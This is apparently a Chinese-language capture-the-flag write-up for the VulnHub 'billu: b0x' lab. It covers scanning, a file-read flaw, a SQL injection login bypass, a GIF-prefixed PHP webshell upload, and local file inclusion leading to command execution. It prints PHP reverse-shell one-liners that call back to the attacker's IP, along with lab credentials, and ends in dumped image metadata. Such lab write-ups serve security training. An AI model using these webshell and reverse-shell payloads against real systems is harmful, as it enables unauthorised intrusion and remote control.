[vulnhub] billu: b0x

https://www.vulnhub.com/entry/billu-b0x,188/

主机发现端口扫描

  1. 使用nmap扫描网段类存活主机

    因为靶机是我最后添加的,所以靶机IP是168

    nmap -sP 192.168.75.0/24
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-28 18:54 CST
    Nmap scan report for 192.168.75.1
    Host is up (0.00018s latency).
    MAC Address: 00:50:56:C0:00:08 (VMware)
    Nmap scan report for 192.168.75.2
    Host is up (0.00011s latency).
    MAC Address: 00:50:56:FB:CA:45 (VMware)
    Nmap scan report for 192.168.75.165
    Host is up (0.00040s latency).
    MAC Address: 00:0C:29:6E:AB:A3 (VMware)
    Nmap scan report for 192.168.75.168
    Host is up (0.00017s latency).
    MAC Address: 00:0C:29:0E:1C:A5 (VMware)
    Nmap scan report for 192.168.75.254
    Host is up (0.00013s latency).
    MAC Address: 00:50:56:EC:C5:A4 (VMware)
    Nmap scan report for 192.168.75.151
    
  2. 扫描主机开放端口

    nmap -sT -min-rate 10000 -p- 192.168.75.168                   
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-28 18:56 CST
    Nmap scan report for 192.168.75.168
    Host is up (0.00068s latency).
    Not shown: 65533 closed tcp ports (conn-refused)
    PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    MAC Address: 00:0C:29:0E:1C:A5 (VMware)
    
  3. 扫描主机服务版本以及系统版本

    nmap -sV -sT -O -p22,80 192.168.75.168                        
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-28 18:56 CST
    Nmap scan report for 192.168.75.168
    Host is up (0.00040s latency).PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
    80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
    MAC Address: 00:0C:29:0E:1C:A5 (VMware)
    Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
    Device type: general purpose
    Running: Linux 3.X|4.X
    OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
    OS details: Linux 3.2 - 4.9
    Network Distance: 1 hop
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
  4. 扫描漏洞

    nmap -script=vuln -p22,80 192.168.75.168                             
    Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-28 18:58 CST
    Nmap scan report for 192.168.75.168
    Host is up (0.00034s latency).PORT   STATE SERVICE
    22/tcp open  ssh
    80/tcp open  http
    | http-cookie-flags: 
    |   /: 
    |     PHPSESSID: 
    |_      httponly flag not set
    |_http-csrf: Couldn't find any CSRF vulnerabilities.
    | http-internal-ip-disclosure: 
    |_  Internal IP Leaked: 127.0.1.1
    |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
    |_http-dombased-xss: Couldn't find any DOM based XSS.
    | http-enum: 
    |   /test.php: Test page
    |_  /images/: Potentially interesting directory w/ listing on 'apache/2.2.22 (ubuntu)'
    MAC Address: 00:0C:29:0E:1C:A5 (VMware)
    

    优先级 80 > 22

web渗透

  1. 访问页面 出现 Show me your SQLI skills

    在这里插入图片描述

  2. 所以我们先跟着它的提示走,尝试sql注入,这里我尝试了手工注入和sqlmap,都无法注入,先不管,先扫目录

  3. 扫描目录

    dirsearch -u 192.168.75.168 -x 403
    //
    [21:54:33] Starting:                                                                                                                                       
    [21:54:43] 200 -  307B  - /add.php                                          
    [21:54:43] 200 -  307B  - /add
    [21:54:55] 200 -    1B  - /c                                                
    [21:55:06] 200 -    3KB - /head                                             
    [21:55:06] 200 -    3KB - /head.php
    [21:55:07] 301 -  249B  - /images  ->  http://192.168.75.168/images/        
    [21:55:07] 200 -  499B  - /images/                                          
    [21:55:07] 200 -   47KB - /in                                               
    [21:55:18] 302 -    2KB - /panel  ->  index.php                             
    [21:55:18] 302 -    2KB - /panel.php  ->  index.php                         
    [21:55:19] 200 -    8KB - /phpmy/                                           
    [21:55:27] 200 -    1B  - /show                                             
    [21:55:32] 200 -   72B  - /test                                             
    [21:55:32] 200 -   72B  - /test.php   
    
    • add.php 是一个上传文件的页面,可能存在文件上传包含等漏洞

    • images是存放图片的文件夹,可能上传的文件是存放在此处

      有三个文件,文件名为 luffy_shanks.jpg,luffy_shanks.png,white_bread.png

    • inphpinfo页面

    • phpmy/phpmyadmin

    • test页面,提示加上file元素,可以尝试文件包含

    优先级 test >add.php > …

  4. test.php 渗透

    • 进入页面显示 'file' parameter is empty. Please provide file path in 'file' parameter 提示我们缺少参数file并加上文件路径

    • 使用wfuzz尝试(GET)

      
      wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.75.168/test?file=FUZZ 
      

      无结果

    • 尝试POST方法

      使用hackerbar加上post参数file=/etc/passwd ,下载到了文件passwd

      # passwd文件内容
      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/bin/sh
      bin:x:2:2:bin:/bin:/bin/sh
      sys:x:3:3:sys:/dev:/bin/sh
      sync:x:4:65534:sync:/bin:/bin/sync
      games:x:5:60:games:/usr/games:/bin/sh
      man:x:6:12:man:/var/cache/man:/bin/sh
      lp:x:7:7:lp:/var/spool/lpd:/bin/sh
      mail:x:8:8:mail:/var/mail:/bin/sh
      news:x:9:9:news:/var/spool/news:/bin/sh
      uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
      proxy:x:13:13:proxy:/bin:/bin/sh
      www-data:x:33:33:www-data:/var/www:/bin/sh
      backup:x:34:34:backup:/var/backups:/bin/sh
      list:x:38:38:Mailing List Manager:/var/list:/bin/sh
      irc:x:39:39:ircd:/var/run/ircd:/bin/sh
      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
      nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
      libuuid:x:100:101::/var/lib/libuuid:/bin/sh
      syslog:x:101:103::/home/syslog:/bin/false
      mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
      messagebus:x:103:106::/var/run/dbus:/bin/false
      whoopsie:x:104:107::/nonexistent:/bin/false
      landscape:x:105:110::/var/lib/landscape:/bin/false
      sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
      ica:x:1000:1000:ica,,,:/home/ica:/bin/bash
      

      应该是靶机的passwd文件,尝试包含其他文件

    • 尝试别的文件是无回显或者是file not found

    • 尝试包含了images文件夹的图片(/var/www/images/ /var/www/ 为默认路径),发现可以包含,想到一个方法,有没有可能是让我们上传图片马然后让我们去包含

      在这里插入图片描述

  5. 尝试文件上传

    • 来到add.php ,我尝试了上传文件发现都无法上传上去,主要有几个参数不知道有什么用

      在这里插入图片描述

文件读取

  1. 因为test.php 可以文件读取,我们可以尝试读取 add.php

    # 包含 file=/var/www/add.php 回显 
    <?php
    echo '<form  method="post" enctype="multipart/form-data">Select image to upload:<input type="file" name=image><input type=text name=name value="name"><input type=text name=address value="address"><input type=text name=id value=1337 ><input type="submit" value="upload" name="upload">
    </form>';
    ?>
    

    是一个表单用来上传,但是没有什么信息,继续尝试包含

  2. index.html

    获得登录逻辑

    <?php
    session_start();include('c.php');
    include('head.php');
    if(@$_SESSION['logged']!=true)
    {$_SESSION['logged']='';}if($_SESSION['logged']==true &&  $_SESSION['admin']!='')
    {echo "you are logged in :)";header('Location: panel.php', true, 302);
    }
    else
    {
    echo '<div align=center style="margin:30px 0px 0px 0px;">
    <font size=8 face="comic sans ms">--==[[ billu b0x ]]==--</font> 
    <br><br>
    Show me your SQLI skills <br>
    <form method=post>
    Username :- <Input type=text name=un> &nbsp Password:- <input type=password name=ps> <br><br>
    <input type=submit name=login value="let\'s login">';
    }
    if(isset($_POST['login']))
    {$uname=str_replace('\'','',urldecode($_POST['un']));$pass=str_replace('\'','',urldecode($_POST['ps']));$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';$result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {$row = mysqli_fetch_assoc($result);echo "You are allowed<br>";$_SESSION['logged']=true;$_SESSION['admin']=$row['username'];header('Location: panel.php', true, 302);}
    else
    {echo "<script>alert('Try again');</script>";
    }}
    echo "<font size=5 face=\"comic sans ms\" style=\"left: 0;bottom: 0; position: absolute;margin: 0px 0px 5px;\">B0X Powered By <font color=#ff9933>Pirates</font> ";?>
    
  3. c.php ,得到数据库账号密码billub0x_billu

    <?php
    #header( 'Z-Powered-By:its chutiyapa xD' );
    header('X-Frame-Options: SAMEORIGIN');
    header( 'Server:testing only' );
    header( 'X-Powered-By:testing only' );ini_set( 'session.cookie_httponly', 1 );$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");// Check connection
    if (mysqli_connect_errno()){echo "connection failed ->  " . mysqli_connect_error();}?>
    
  4. show.php

    <?php
    include('c.php');if(isset($_POST['continue']))
    {$run='select * from users ';$result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {
    echo "<table width=90% ><tr><td>ID</td><td>User</td><td>Address</td><td>Image</td></tr>";while($row = mysqli_fetch_assoc($result)) {echo '<tr><td>'.$row['id'].'</td><td>'.htmlspecialchars ($row['name'],ENT_COMPAT).'</td><td>'.htmlspecialchars ($row['address'],ENT_COMPAT).'</td><td><img src="uploaded_images/'.htmlspecialchars ($row['image'],ENT_COMPAT).'" height=90px width=100px></td></tr>';
    }echo "</table>";
    }
    }?>
    

    看到内容

    echo '<tr><td>'.$row['id'].'</td><td>'.htmlspecialchars ($row['name'],ENT_COMPAT).'</td><td>'.htmlspecialchars ($row['address'],ENT_COMPAT).'</td><td><img src="uploaded_images/'.htmlspecialchars ($row['image'],ENT_COMPAT).'" height=90px width=100px></td></tr>';
    

    得到路径 uploaded_images/

文件读取的到的信息

  1. 数据库账号密码billub0x_billu

  2. 以及路径 uploaded_images/ 下存在三个文件 CaptBarbossa.JPGjack.jpgc.JPG

  3. 登录逻辑

    $uname=str_replace('\'','',urldecode($_POST['un']));$pass=str_replace('\'','',urldecode($_POST['ps']));$run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
    

登录数据库

  1. 进入phpmyadmin使用得到的账户登录,成功进入

  2. 存在ica_lab库,还有auth download users三张表

    # auth 无数据# download
    id 	image_name 	location
    1 	Marine ford 	images/marine.jpg
    2 	Luffy fourth gear 	images/Gear_Four_luffy.jpg
    3 	Newgate Vs Teach 	images/Newgate_Vs_Teach.jpg
    4 	straw-hat crew 	images/straw_hat_crew.jpg
    5 	Whitebeard luffy ace 	images/Whitebeard_luffy_ace.jpg# users
    id 	name 	image 	address
    1 	Jack 	jack.jpg 	Jack sparrow, Pirate of the caribbean
    2 	Captain Barbossa 	CaptBarbossa.JPG 	Captain Barbossa, pirate of the caribbean
    

    可以看到users表的参数和我们的add页面的参数一模一样

    之后我模仿着上传图片依旧不成功,毕竟有了登录逻辑,去尝试注入

SQL注入

  1. 前面获得了登录逻辑

    $uname=str_replace('\'','',urldecode($_POST['un']));
    $pass=str_replace('\'','',urldecode($_POST['ps']));
    $run='select * from auth where  pass=\''.$pass.'\' and uname=\''.$uname.'\'';
    

    只要我们在passname处输入 or 1 = 1 #\ 即可登录(看的dalao的,我没怎么看出来要怎么注入这里)

  2. 进去后发现内容是之前的users表的内容,发现左上角的Show Users可以更换为Add User (注意页面是panel.php

    在这里插入图片描述

  3. 现在的思路是准备一张图片马,内容是一句话木马,然后将图片上传上去,最后我们再去包含

  4. 准备图片马(一开始我没加文件头,上传失败了,最后加上文件头就成功了)

    # shell.png
    GIF89a
    <?php eval($_GET['a']); ?>
    
  5. 上传图片,addressuser随便填,上传成功,/uploaded_images/下可以看到我们上传shell.png

文件包含

  1. /uploaded_images/ 下是不能直接包含的,test.php我也尝试了不行,所以我们需要寻找别的包含

  2. 我们可以注意到panel.php 存在包含,抓包看看

    POST /panel.php HTTP/1.1
    Host: 192.168.75.168
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 27
    Origin: http://192.168.75.168
    Sec-GPC: 1
    Connection: keep-alive
    Referer: http://192.168.75.168/panel.php
    Cookie: PHPSESSID=cd9b68ma23evk5m8s7dknreod5
    Upgrade-Insecure-Requests: 1
    Priority: u=0, iload=show&continue=continue
    
  3. 存在load参数,我们将它设置为shell.png的路径,并且设置get参数a的值a=system('whoami')

    POST /panel.php?a=system('whoami'); HTTP/1.1  //给get参数,执行命令whoami
    Host: 192.168.75.168
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 48
    Origin: http://192.168.75.168
    Sec-GPC: 1
    Connection: keep-alive
    Referer: http://192.168.75.168/panel.php
    Cookie: PHPSESSID=cd9b68ma23evk5m8s7dknreod5
    Upgrade-Insecure-Requests: 1
    Priority: u=0, iload=uploaded_images/shell.png&continue=continue //load设置路径
    

    回显中获得当前用户,www-data

    GIF89a
    www-data
    
  4. 我们将参数设置为 下面的,进行反弹shell,同时kali开启监听

    php -r '$sock=fsockopen("x.x.x.x",1234);exec("/bin/bash -i <&3 >&3 2>&3");'
    

    但是发现触发不了因为我们上传的图片马内容是<?php eval($_GET['a']); ?>

    # 就会变成
    system("php -r '$sock=fsockopen("192.168.75.151",1234);exec("/bin/sh -i <&3 >&3 2>&3");'");
    

    引号提前闭合了,所以我们需要重新上传一个图片马,内容是<?php system($_GET['a']); ?> ,文件名为shell2.png

  5. 继续尝试包含执行反弹shell

    POST /panel.php?a=php -r "$sock=fsockopen('192.168.75.151',1234);exec('/bin/sh -i <&3 >&3 2>&3');" HTTP/1.1
    Host: 192.168.75.168
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Origin: http://192.168.75.168
    Sec-GPC: 1
    Connection: keep-alive
    Referer: http://192.168.75.168/panel.php
    Cookie: PHPSESSID=cd9b68ma23evk5m8s7dknreod5
    Upgrade-Insecure-Requests: 1
    Priority: u=0, iload=uploaded_images/shell2.png&continue=continue
    

    依旧不成功,将参数设置为url编码试试

    POST /panel.php?a=php+-r+'$sock%3dfsockopen("192.168.75.151",1234)%3bexec("/bin/bash+-i+<%263+>%263+2>%263")%3b' HTTP/1.1
    Host: 192.168.75.168
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate, br
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 49
    Origin: http://192.168.75.168
    Sec-GPC: 1
    Connection: keep-alive
    Referer: http://192.168.75.168/panel.php
    Cookie: PHPSESSID=cd9b68ma23evk5m8s7dknreod5
    Upgrade-Insecure-Requests: 1
    Priority: u=0, iload=uploaded_images/shell2.png&continue=continue
    

    反弹shell成功

提权

  1. 查看权限

    www-data@indishell:/var/www$ whoami
    www-data
    //
    www-data@indishell:/var/www$ id
    uid=33(www-data) gid=33(www-data) groups=33(www-data)
    //
    www-data@indishell:/var/www$ uname -a
    Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
    //
    www-data@indishell:/var/www$ find / -perm -u=s -type f 2>/dev/null
    /bin/fusermount
    /bin/ping
    /bin/ping6
    /bin/umount
    /bin/mount
    /bin/su
    /usr/sbin/pppd
    /usr/sbin/uuidd
    /usr/lib/eject/dmcrypt-get-device
    /usr/lib/openssh/ssh-keysign
    /usr/lib/dbus-1.0/dbus-daemon-launch-helper
    /usr/bin/chsh
    /usr/bin/traceroute6.iputils
    /usr/bin/mtr
    /usr/bin/sudo
    /usr/bin/gpasswd
    /usr/bin/at
    /usr/bin/newgrp
    /usr/bin/chfn
    /usr/bin/sudoedit
    //
    www-data@indishell:/var/www$ cat /etc/crontab
    # /etc/crontab: system-wide crontab
    # Unlike any other crontab you don't have to run the `crontab'
    # command to install the new version when you edit this file
    # and files in /etc/cron.d. These files also have username fields,
    # that none of the other crontabs do.SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin# m h dom mon dow user  command
    17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
    25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
    47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
    52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
    #
    //
  2. 寻找敏感文件

    发现www目录下的phpmy/config.inc.php存在数据库的root账号密码root:roottoor

    尝试登陆了数据库,发现存在权限还是密码不对

  3. ssh密码碰撞,碰撞成功….

    ssh 192.168.75.168
    root@192.168.75.168's password: 
    //
    Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)* Documentation:  https://help.ubuntu.com/System information as of Mon Oct 28 22:07:24 IST 2024System load:  0.0               Processes:           107Usage of /:   11.9% of 9.61GB   Users logged in:     0Memory usage: 17%               IP address for eth0: 192.168.75.168Swap usage:   0%Graph this data and manage this system at:https://landscape.canonical.com/New release '14.04.5 LTS' available.
    Run 'do-release-upgrade' to upgrade to it.Your Hardware Enablement Stack (HWE) is supported until April 2017.The programs included with the Ubuntu system are free software;
    the exact distribution terms for each program are described in the
    individual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
    applicable law.root@indishell:~# 

彩蛋

uploaded_images/ 下的三个文件 CaptBarbossa.JPGjack.jpgc.JPG 是存在内容的

# CaptBarbossa.JPG
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict><key>com.apple.print.PageFormat.PMHorizontalRes</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PageFormat.PMHorizontalRes</key><real>72</real><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2005-03-28T22:13:57Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PageFormat.PMOrientation</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PageFormat.PMOrientation</key><integer>1</integer><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2005-03-28T22:13:57Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PageFormat.PMScaling</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PageFormat.PMScaling</key><real>1</real><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2005-03-28T22:13:57Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PageFormat.PMVerticalRes</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PageFormat.PMVerticalRes</key><real>72</real><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2005-03-28T22:13:57Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PageFormat.PMVerticalScaling</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PageFormat.PMVerticalScaling</key><real>1</real><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2005-03-28T22:13:57Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.subTicket.paper_info_ticket</key><dict><key>com.apple.print.PageFormat.PMAdjustedPageRect</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PageFormat.PMAdjustedPageRect</key><array><real>0.0</real><real>0.0</real><real>734</real><real>576</real></array><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2007-05-10T17:29:41Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PageFormat.PMAdjustedPaperRect</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PageFormat.PMAdjustedPaperRect</key><array><real>-18</real><real>-18</real><real>774</real><real>594</real></array><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2007-05-10T17:29:41Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PaperInfo.PMPaperName</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.print.pm.PostScript</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PaperInfo.PMPaperName</key><string>na-letter</string><key>com.apple.print.ticket.client</key><string>com.apple.print.pm.PostScript</string><key>com.apple.print.ticket.modDate</key><date>2003-07-01T17:49:36Z</date><key>com.apple.print.ticket.stateFlag</key><integer>1</integer></dict></array></dict><key>com.apple.print.PaperInfo.PMUnadjustedPageRect</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.print.pm.PostScript</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PaperInfo.PMUnadjustedPageRect</key><array><real>0.0</real><real>0.0</real><real>734</real><real>576</real></array><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2005-03-28T22:13:57Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PaperInfo.PMUnadjustedPaperRect</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.print.pm.PostScript</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PaperInfo.PMUnadjustedPaperRect</key><array><real>-18</real><real>-18</real><real>774</real><real>594</real></array><key>com.apple.print.ticket.client</key><string>com.apple.printingmanager</string><key>com.apple.print.ticket.modDate</key><date>2005-03-28T22:13:57Z</date><key>com.apple.print.ticket.stateFlag</key><integer>0</integer></dict></array></dict><key>com.apple.print.PaperInfo.ppd.PMPaperName</key><dict><key>com.apple.print.ticket.creator</key><string>com.apple.print.pm.PostScript</string><key>com.apple.print.ticket.itemArray</key><array><dict><key>com.apple.print.PaperInfo.ppd.PMPaperName</key><string>US Letter</string><key>com.apple.print.ticket.client</key><string>com.apple.print.pm.PostScript</string><key>com.apple.print.ticket.modDate</key><date>2003-07-01T17:49:36Z</date><key>com.apple.print.ticket.stateFlag</key><integer>1</integer></dict></array></dict><key>com.apple.print.ticket.APIVersion</key><string>00.20</string><key>com.apple.print.ticket.privateLock</key><false/><key>com.apple.print.ticket.type</key><string>com.apple.print.PaperInfoTicket</string></dict><key>com.apple.print.ticket.APIVersion</key><string>00.20</string><key>com.apple.print.ticket.privateLock</key><false/><key>com.apple.print.ticket.type</key><string>com.apple.print.PageFormatTicket</string>
</dict>
</plist><x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="3.1.1-112"><rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about=""xmlns:exif="http://ns.adobe.com/exif/1.0/"><exif:ExposureTime>1/40</exif:ExposureTime><exif:FNumber>28/10</exif:FNumber><exif:ExposureProgram>1</exif:ExposureProgram><exif:ExifVersion>0220</exif:ExifVersion><exif:DateTimeOriginal>2004-03-18T08:16:53-08:00</exif:DateTimeOriginal><exif:DateTimeDigitized>2004-03-18T08:16:53-08:00</exif:DateTimeDigitized><exif:ShutterSpeedValue>352256/65536</exif:ShutterSpeedValue><exif:ApertureValue>196608/65536</exif:ApertureValue><exif:ExposureBiasValue>0/1</exif:ExposureBiasValue><exif:MeteringMode>5</exif:MeteringMode><exif:FocalLength>70/1</exif:FocalLength><exif:FlashpixVersion>0100</exif:FlashpixVersion><exif:ColorSpace>-1</exif:ColorSpace><exif:PixelXDimension>800</exif:PixelXDimension><exif:PixelYDimension>532</exif:PixelYDimension><exif:FocalPlaneXResolution>4064000/1408</exif:FocalPlaneXResolution><exif:FocalPlaneYResolution>2704000/937</exif:FocalPlaneYResolution><exif:FocalPlaneResolutionUnit>2</exif:FocalPlaneResolutionUnit><exif:CustomRendered>0</exif:CustomRendered><exif:ExposureMode>1</exif:ExposureMode><exif:WhiteBalance>1</exif:WhiteBalance><exif:SceneCaptureType>0</exif:SceneCaptureType><exif:ISOSpeedRatings><rdf:Seq><rdf:li>500</rdf:li></rdf:Seq></exif:ISOSpeedRatings><exif:ComponentsConfiguration><rdf:Seq><rdf:li>1</rdf:li><rdf:li>2</rdf:li><rdf:li>3</rdf:li><rdf:li>0</rdf:li></rdf:Seq></exif:ComponentsConfiguration><exif:Flash rdf:parseType="Resource"><exif:Fired>False</exif:Fired><exif:Return>0</exif:Return><exif:Mode>0</exif:Mode><exif:Function>False</exif:Function><exif:RedEyeMode>False</exif:RedEyeMode></exif:Flash><exif:NativeDigest>36864,40960,40961,37121,37122,40962,40963,37510,40964,36867,36868,33434,33437,34850,34852,34855,34856,37377,37378,37379,37380,37381,37382,37383,37384,37385,37386,37396,41483,41484,41486,41487,41488,41492,41493,41495,41728,41729,41730,41985,41986,41987,41988,41989,41990,41991,41992,41993,41994,41995,41996,42016,0,2,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,20,22,23,24,25,26,27,28,30;CB4FF41594E79B74E70EF6E485ACE320</exif:NativeDigest></rdf:Description><rdf:Description rdf:about=""xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/"><photoshop:Source>0611-P3C-02224</photoshop:Source><photoshop:DateCreated>2004-03-18</photoshop:DateCreated><photoshop:ColorMode>3</photoshop:ColorMode><photoshop:History/></rdf:Description><rdf:Description rdf:about=""xmlns:tiff="http://ns.adobe.com/tiff/1.0/"><tiff:Make>Canon</tiff:Make><tiff:Model>Canon EOS-1DS</tiff:Model><tiff:Orientation>1</tiff:Orientation><tiff:XResolution>3000000/10000</tiff:XResolution><tiff:YResolution>3000000/10000</tiff:YResolution><tiff:ResolutionUnit>2</tiff:ResolutionUnit><tiff:YCbCrPositioning>2</tiff:YCbCrPositioning><tiff:NativeDigest>256,257,258,259,262,274,277,284,530,531,282,283,296,301,318,319,529,532,306,270,271,272,305,315,33432;575D42837E076431FF44B6EA25D5EB3A</tiff:NativeDigest></rdf:Description><rdf:Description rdf:about=""xmlns:xap="http://ns.adobe.com/xap/1.0/"><xap:CreateDate>2007-05-10T10:27:32-07:00</xap:CreateDate><xap:ModifyDate>2007-05-10T10:32:05-07:00</xap:ModifyDate><xap:MetadataDate>2007-05-10T10:32:05-07:00</xap:MetadataDate><xap:CreatorTool>Adobe Photoshop CS2 Macintosh</xap:CreatorTool></rdf:Description><rdf:Description rdf:about=""xmlns:xapMM="http://ns.adobe.com/xap/1.0/mm/"xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#"><xapMM:DerivedFrom rdf:parseType="Resource"><stRef:instanceID>adobe:docid:photoshop:a6a4832a-9cab-11d9-8dd4-f1f6f2f95eb5</stRef:instanceID><stRef:documentID>adobe:docid:photoshop:a6a4832a-9cab-11d9-8dd4-f1f6f2f95eb5</stRef:documentID></xapMM:DerivedFrom><xapMM:DocumentID>uuid:378ADF1C007311DCAB7C93C7B8C4BABA</xapMM:DocumentID><xapMM:InstanceID>uuid:F86D1EFF007311DCAB7C93C7B8C4BABA</xapMM:InstanceID></rdf:Description><rdf:Description rdf:about=""xmlns:xapRights="http://ns.adobe.com/xap/1.0/rights/"><xapRights:Marked>True</xapRights:Marked></rdf:Description><rdf:Description rdf:about=""xmlns:photomechanic="http://ns.camerabits.com/photomechanic/1.0/"><photomechanic:Prefs>0:0:0:-00001</photomechanic:Prefs><photomechanic:TimeCreated>081653-0800</photomechanic:TimeCreated></rdf:Description><rdf:Description 